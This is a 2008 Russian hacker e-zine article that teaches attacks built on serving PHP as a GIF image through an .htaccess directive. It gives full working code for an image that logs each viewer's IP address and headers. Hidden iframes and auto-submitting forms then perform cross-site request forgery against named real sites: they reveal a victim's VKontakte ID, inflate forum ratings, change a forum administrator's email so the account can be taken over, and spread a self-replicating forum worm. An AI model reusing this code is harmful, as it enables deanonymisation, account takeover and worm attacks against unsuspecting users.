hack.connect
 
[ru.scene.community]
HackConnect.E-zine issue #3
// 01010 Оригинальное использование директив htaccess
####################################################
## 2008 (c) Noctambulaar / www.noctambulaar.ru
####################################################

Предисловие:
В данной статье описываются методы поиска виртуального собеседника, взлом аккаунтов, написание самораспространяющегося кода. Все методы описаны с использованием одного способа (тип x-httpd-php .gif). Для того, чтобы усвоить матерьял, нужно иметь хотя бы какое-то представление о html и php, так же потребуется хостинг с php. Все примеры рассчитаны на прямое действие, то есть подразумевается создание файлов на своём хостинге.

Узнаём больше:
На сегодняшний момент, многие из нас имеют свою страницу в популярных соц. сетях вконтакте, однокласники, фейсбук, ЖЖ и тд, в этом примере, я покажу, как можно узнать о человеке не только его IP адрес, но и адрес страницы в соц. сети.

Создаём файл:
.htaccess
Содержимое файла:
<Files "pict.gif">
  AddType application/x-httpd-php .gif
</Files>

[?] Этот файл поможет нам загружать php код из файла с расширением .gif

Создаём файл:
pict.gif
Содержимое файла:
<?
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$query = $_SERVER['QUERY_STRING'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$datetime = date('r');
$filename = date("m.Y");
$fp = fopen("log.txt", "a");
fputs($fp, "--------------------------------------------------------- \r\n");
fputs($fp, "|Date: ".$datetime."|IP: ".$ip."|Host: ".$host."|Agent: ".$agent."|Referer: ".$referer."|Query: ".$query."|RealIP: ".$realip."\r\n");
fputs($fp, "--------------------------------------------------------- \r\n");
fclose($fp);
require "action.html";
?>

[?] Этот файл запишет информацию о datetime, ip, host, referer, query, agent, realip того, кто будет просматривать наш pict.gif. Запись информации будет в файл "log.txt". Так же в коде присутствует загрузка файла с html скриптами (require "action.html";) о ней после.

Далее нам потребуется какая-нибудь картинка gif, закидываем её в наш каталог к созданным скриптам. Имя картинки ставим mygiffile.gif

Переходим к созданию файла с html скриптами. В нем я опишу, как узнать у человека его ID в контакте. Нам потребуется зарегистрировать новую группу вконтакте, далее выписываем ID созданной группы.

Создаём файл:
action.html
Содержимое файла:
<img src="mygiffile.gif">
<iframe src="http://vkontakte.ru/groups.php?act=enter&gid=4272632" WIDTH="0" HEIGHT="0">

[?] В этом файле идет добавление id просматривающего наш "pict.gif" в созданную группу.
groups.php?act=enter&gid=4272632 где вместо 4272632 впишем свой номер клуба.

Готово. Теперь можно использовать то, что создали.
Достаточно послать человека по ссылке на "pict.gif" или выложить файл на форуме [IMG]http://.....pict.gif[/IMG] или создать html страницу и у нас будет его IP и Id контакта.

Повышаем рейтинг:
Многие гонятся за рейтингом на форуме, на примере "vBulletin v3.6.8 | xakepy.ru и antichat.ru" покажу, как накрутить себе рейтинг.

Пишем где-нибудь на форуме сообщение, далее смотрим номер созданного сообщения. Предположим "_http://www.xakepy.ru/showpost.php?p=261260", я беру этот номер "261260" и создаю такую ссылку "_http://www.xakepy.ru/post_thanks.php?do=post_thanks_add&p=261260". Тем самым, добавление плюсов будет для этого сообщения, автор сообщения которого Вы.


Создаём файл:
.htaccess
Содержимое файла:
<Files "pict.gif">
  AddType application/x-httpd-php .gif 
</Files>

[?] Этот файл поможет нам загружать php код из файла с расширением .gif

Создаём файл:
pict.gif
Содержимое файла:
<?
$ip = $_SERVER['REMOTE_ADDR'];
$host = $_SERVER['REMOTE_ADDR'];
$referer = $_SERVER['HTTP_REFERER'];
$query = $_SERVER['QUERY_STRING'];
$agent = $_SERVER['HTTP_USER_AGENT'];
$realip = $_SERVER['HTTP_X_FORWARDED_FOR'];
$datetime = date('r');
$filename = date("m.Y");
$fp = fopen("log.txt", "a");
fputs($fp, "--------------------------------------------------------- \r\n");
fputs($fp, "|Date: ".$datetime."|IP: ".$ip."|Host: ".$host."|Agent: ".$agent."|Referer: ".$referer."|Query: ".$query."|RealIP: ".$realip."\r\n");
fputs($fp, "--------------------------------------------------------- \r\n");
fclose($fp);
require "action.html";
?>

[?] Этот файл запишет информацию о datetime, ip, host, referer, query, agent, realip того, кто будет просматривать наш pict.gif. Запись информации будет в файл "log.txt". Так же в коде присутствует загрузка файла с html скриптами (require "action.html";) о ней после.

Далее нам потребуется какая-нибудь картинка gif, закидываем её в наш каталог к созданным скриптам. Имя картинки ставим mygiffile.gif

Переходим к созданию файла с html скриптами. В нём я опишу, как загрузить добавление рейтинга на примере форума "xakepy.ru" и "antichat.ru".

Создаём файл:
action.html
Содержимое файла:
<img src="mygiffile.gif">
<iframe src="http://www.xakepy.ru/post_thanks.php?do=post_thanks_add&p=261260" WIDTH="0" HEIGHT="0">

<form action="http://forum.antichat.ru/reputation.php" method="post">     
<label for="rb_reputation_pos"><input type="radio" name="reputation" value="pos" id="rb_reputation_pos" checked="checked" />Одобряю</label></div>
<select name="score" class="bginput">
<option value="0">Max</option>
<option value="1" selected=selected>1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
</select>
<input type="text" class="bginput" size="40" maxlength="250" value="hek_crek_crw" name="reason" />
<input type="hidden" name="do" value="addreputation" />
<input type="hidden" name="p" value="816899" />
<body onload="document.forms[0].submit()">

[?] Тут мы создали добавление рейтинга для форумов. Пример по "xakepy" я описал, теперь объясню пример "antichat".

name="p" value="816899" ## value="816899" -- id темы antichat.
value="hek_crek_crw" ## коммент к рейтингу.

Просмотреть скрипт для добавления рейтинга не составляет труда.

Выкладываем ссылку на [IMG]http://.....pict.gif[/IMG] в каком-нибудь активном сообщении и получаем рейтинг +1 от юзеров, которые заходят почитать наше сообщение. Ссылку можно ставить вместо аватара или в подпись.

Изменяем настройки или взлом аккаунта:
Наже будет пример, при помощи которого, можно сменить мыло админа форума. Так же подобным образом, можно поставить себя админом или менять подпись пользователя.

На этот раз, сделаю пример с "punbb | wasm.ru".
Используем скрипты, которые мы создавали раньше, но файл "action.html" мы создаём снова.

Создаём файл:
action.html
Содержимое файла:
<img src="mygiffile.gif">
<form id="profile1" method="post" action="http://www.wasm.ru/forum/profile.php?section=essentials&amp;id=2" onsubmit="return process_form(this)">
<input type="hidden" name="form_sent" value="1" />
<input type="text" name="req_email" value="[email protected]" size="40" maxlength="50" /><br /></label>
<body onload="document.forms[0].submit()">

[?] скрипт изменения email, где "id=2" -- id жертвы; value="[email protected]" -- на это меняем.

Посылаем жертву на файл "pict.gif" или посылаем в личку [img]http://..pict.gif[/img], далее можно восстанавливать пароль на наше мыло.

Самораспространяющийся код:
Ради примера возьму "antichat.ru". Скрипты используем из прошлых примеров, кроме "action.html".

Создаём файл:
action.html
Содержимое файла:
<img src="mygiffile.gif">
<form action="http://forum.antichat.ru/newthread.php" method="post" name="vbform" onsubmit="return validatePost(this, this.subject.value, 2, 25000);" onreset="vB_RESET(this);">
<input type="text" class="bginput" name="subject" value="hek crek crw top" size="40" maxlength="85" tabindex="1" /></td>
<textarea name="message" id="message" rows="20" cols="60" wrap="virtual" style="width:auto; height:250px" tabindex="1">hek crek crw  messages [IMG]http://.....pict.gif[/IMG]</textarea>     
<input type="hidden" name="s" value="" />
<input type="hidden" name="f" value="23" />
<input type="hidden" name="do" value="postthread" />
<input type="hidden" name="posthash" value="" />
<input type="hidden" name="poststarttime" value="" />
<body onload="document.forms[0].submit()">

[?] В этом скрипте происходит добавление темы.
value="hek crek crw top" -- низвание топиков;
hek crek crw messages [IMG]http://.....pict.gif[/IMG] -- сообщение для распространения, в сообщение обязательно добавить [IMG]http://.....pict.gif[/IMG].
value="23" -- номер раздела для распространения, так же можно написать value="'+Math.floor( 15*Math.random() )+'" # тем самым раздел будет выбираться случайно.

При заходе на сформированное сообщение с [IMG]http://.....pict.gif[/IMG] юзер создает подобное сообщение. Наш червь распространяется по форуму и несёт текст сообщения. Аналогично можно сделать по ЖЖ и по личкам различных форумов. Таким же образом, можно подменять сообщение юзера в какой-либо теме.

####################################################
Надеюсь, вы получили хоть какое-то представление. При помощи этого метода, можно сделать все что угодно, если нет дополнительных защит.
/* ----------------------------------------------------[contents]----------------------------------------------------- */